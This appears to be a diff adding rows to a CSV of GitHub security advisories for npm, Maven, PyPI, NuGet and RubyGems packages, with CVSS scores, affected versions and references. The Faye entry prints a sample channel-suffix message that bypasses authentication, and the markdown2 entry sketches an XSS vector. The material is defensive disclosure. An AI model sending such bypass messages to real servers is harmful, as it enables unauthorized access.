+This fix patches the Auth0.js and may require changes in application code due to password no longer available in error object, but it will not impact your users, their current state, or any existing sessions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'auth0-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '9.13.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/auth0.js/security/advisories/GHSA-prfq-f66g-43mp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5263'}, {'type': 'WEB', 'url': 'https://github.com/auth0/auth0.js/commit/355ca749b229fb93142f0b3978399b248d710828'}]","{'cwe_ids': ['CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-09T15:53:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jpcq-cgw6-v4j6,2022-02-08T22:06:24Z,2020-04-29T22:19:14Z,,['CVE-2020-11023'],Potential XSS vulnerability in jQuery,"### Impact
+Passing HTML containing `` elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`, and others) may execute untrusted code.
+
+### Patches
+This problem is patched in jQuery 3.5.0.
+
+### Workarounds
+To workaround this issue without upgrading, use [DOMPurify](https://github.com/cure53/DOMPurify) with its `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a jQuery method.
+
+### References
+https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
+
+### For more information
+If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery/security/advisories/GHSA-jpcq-cgw6-v4j6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11023'}, {'type': 'WEB', 'url': 'https://blog.jquery.com/2020/04/10/jquery-3-5-0-released'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery/releases/tag/3.5.0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-11023.yml'}, {'type': 'WEB', 'url': 'https://jquery.com/upgrade-guide/3.5/'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c@%3Ccommits.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9@%3Ccommits.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202007-03'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200511-0006/'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-565440'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4693'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2020-002'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-02'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-10'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162160/jQuery-1.0.3-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-29T21:04:50Z', 'nvd_published_at': '2020-04-29T21:15:00Z'}"
+1.4.0,GHSA-5p34-5m6p-p58g,2021-08-25T20:57:31Z,2020-04-23T21:08:40Z,,['CVE-2020-9546'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9546'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2631'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200904-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:26:40Z', 'nvd_published_at': '2020-03-02T04:15:00Z'}"
+1.4.0,GHSA-fv3h-8x5j-pvgq,2023-09-01T10:18:10Z,2020-04-22T20:59:50Z,,['CVE-2020-11888'],XSS in python-markdown2,"python-markdown2 through 2.3.8 allows XSS because element names are mishandled unless a \w+ match succeeds. For example, an attack might use elementname@ or elementname- with an onclick attribute.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'markdown2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.3.8'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11888'}, {'type': 'WEB', 'url': 'https://github.com/trentm/python-markdown2/issues/348'}, {'type': 'PACKAGE', 'url': 'https://github.com/trentm/python-markdown2'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6XOAIRJJCZNJUALXDHSIGH5PS2H63A3J/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQLRBGRVRRZK7P5SFL2MNGXFX37YHJAV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PN6QSHRFZXRQAYZJQ4MOW5MKIXBYOMED/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00031.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00035.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-22T19:19:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5gm3-px64-rw72,2023-02-02T10:30:38Z,2020-04-01T16:36:44Z,,['CVE-2019-19911'],Uncontrolled Resource Consumption in Pillow,"There is a DoS vulnerability in Pillow before 6.2.2 caused by FpxImagePlugin.py calling the range function on an unvalidated 32-bit integer if the number of bands is large. On Windows running 32-bit Python, this results in an OverflowError or MemoryError due to the 2 GB limit. However, on Linux running 64-bit Python this results in the process being terminated by the OOM killer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19911'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/774e53bb132461d8d5ebefec1162e29ec0ebc63d'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/blob/master/CHANGES.rst#622-2020-01-02'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DUMIBUYGJRAVJCTFUWBRLVQKOUTVX5P/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.2.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4272-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4631'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T16:30:58Z', 'nvd_published_at': '2020-01-05T22:15:00Z'}"
+1.4.0,GHSA-9q64-mpxx-87fg,2020-12-15T16:51:18Z,2020-04-01T16:35:08Z,,[],Open Redirect in ecstatic,"Versions of `ecstatic` prior to 4.1.2, 3.3.2 or 2.2.2 are vulnerable to Open Redirect. The package fails to validate redirects, allowing attackers to craft requests that result in an `HTTP 301` redirect to any other domains.
+
+
+## Recommendation
+
+If using `ecstatic` 4.x, upgrade to 4.1.2 or later.
+If using `ecstatic` 3.x, upgrade to 3.3.2 or later.
+If using `ecstatic` 2.x, upgrade to 2.2.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'ecstatic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ecstatic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ecstatic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10775'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/830'}]","{'cwe_ids': ['CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T15:37:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h4rc-386g-6m85,2021-08-23T15:31:59Z,2020-04-23T20:19:02Z,,['CVE-2020-11620'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11620'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2682'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200511-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-22T21:17:03Z', 'nvd_published_at': '2020-04-07T23:15:00Z'}"
+1.4.0,GHSA-9475-xg6m-j7pw,2021-01-08T20:21:35Z,2020-04-22T20:59:37Z,,['CVE-2020-5268'],Subject Confirmation Method not validated in Saml2 Authentication Services for ASP.NET,"### Impact
+Saml2 tokens are usually used as bearer tokens - a caller that presents a token is assumed to be the subject of the token. There is also support in the Saml2 protocol for issuing tokens that is tied to a subject through other means, e.g. holder-of-key where possession of a private key must be proved.
+The Sustainsys.Saml2 library incorrectly treats all incoming tokens as bearer tokens, even though they have another subject confirmation method specified. This could be used by an attacker that could get access to Saml2 tokens with another subject confirmation method than bearer. The attacker could then use such a tocken to create a log in session.
+
+### Patches
+Version 1.0.2 and 2.7.0 are patched.
+
+### Workarounds
+Ensure that any IdentityProvider trusted by the Sustainsys.Saml2 SP only issues bearer tokens if the audience matches the Sustainsys.Saml2 SP.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Comment on #103
+* Email us at security@sustainsys.com if you think that there are further security issues.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Sustainsys.Saml2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Sustainsys.Saml2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/security/advisories/GHSA-9475-xg6m-j7pw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5268'}, {'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/issues/712'}, {'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/commit/e58e0a1aff2b1ead6aca080b7cdced55ee6d5241'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Sustainsys.Saml2/'}]","{'cwe_ids': ['CWE-303'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-21T18:41:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qpg4-4w7w-2mq5,2023-05-16T15:51:44Z,2020-04-29T17:41:15Z,,['CVE-2020-11020'],Authentication and extension bypass in Faye,"On 20 April 2020 it was reported to me that the potential for authentication bypass exists in [Faye][1]'s extension system. This vulnerability has existed in the Node.js and Ruby versions of the server since version 0.5.0, when extensions were first introduced, in July 2010. It is patched in versions 1.0.4, 1.1.3 and 1.2.5, which we are releasing today.
+
+The vulnerability allows any client to bypass checks put in place by server-side extensions, by appending extra segments to the message channel. For example, the Faye [extension docs][2] suggest that users implement access control for subscriptions by checking incoming messages for the `/meta/subscribe` channel, for example:
+
+```js
+server.addExtension({
+ incoming: function(message, callback) {
+ if (message.channel === '/meta/subscribe') {
+ if (message.ext.authToken !== 'my super secret password') {
+ message.error = 'Invalid auth token';
+ }
+ }
+ callback(message);
+ }
+});
+```
+
+A bug in the server's code for recognising the special `/meta/*` channels, which trigger connection and subscription events, means that a client can bypass this check by sending a message to `/meta/subscribe/x` rather than `/meta/subscribe`:
+
+```json
+{
+ ""channel"": ""/meta/subscribe/x"",
+ ""clientId"": ""3jrc6602npj4gyp6bn5ap2wqzjtb2q3"",
+ ""subscription"": ""/foo""
+}
+```
+
+This message will not be checked by the above extension, as it checks the message's channel is exactly equal to `/meta/subscribe`. But it will still be processed as a subscription request by the server, so the client becomes subscribed to the channel `/foo` without supplying the necessary credentials.
+
+The vulnerability is caused by the way the Faye server recognises meta channels. It will treat a message to any channel that's a prefix-match for one of the special channels `/meta/handshake`, `/meta/connect`, `/meta/subscribe`, `/meta/unsubscribe` or `/meta/disconnect`, as though it were an exact match for that channel. So, a message to `/meta/subscribe/x` is still processed as a subscription request, for example.
+
+An authentication bypass for subscription requests is the most serious effect of this but all other meta channels are susceptible to similar manipulation.
+
+This parsing bug in the server is fixed in versions 1.0.4, 1.1.3 and 1.2.5. These should be drop-in replacements for prior versions and you should upgrade immediately if you are running any prior version.
+
+If you are unable to install one of these versions, you can make your extensions catch all messages the server would process by checking the channel _begins_ with the expected channel name, for example:
+
+```js
+server.addExtension({
+ incoming: function(message, callback) {
+ if (message.channel.startsWith('/meta/subscribe')) {
+ // authentication logic
+ }
+ callback(message);
+ }
+});
+```
+
+[1]: https://faye.jcoglan.com/
+[2]: https://faye.jcoglan.com/node/extensions.html","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'faye'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'fixed': '1.0.4'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'faye'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'faye'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/faye/faye/security/advisories/GHSA-qpg4-4w7w-2mq5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11020'}, {'type': 'WEB', 'url': 'https://github.com/faye/faye/commit/65d297d341b607f3cb0b5fa6021a625a991cc30e'}, {'type': 'PACKAGE', 'url': 'https://github.com/faye/faye'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faye/CVE-2020-11020.yml'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-29T17:40:59Z', 'nvd_published_at': None}"
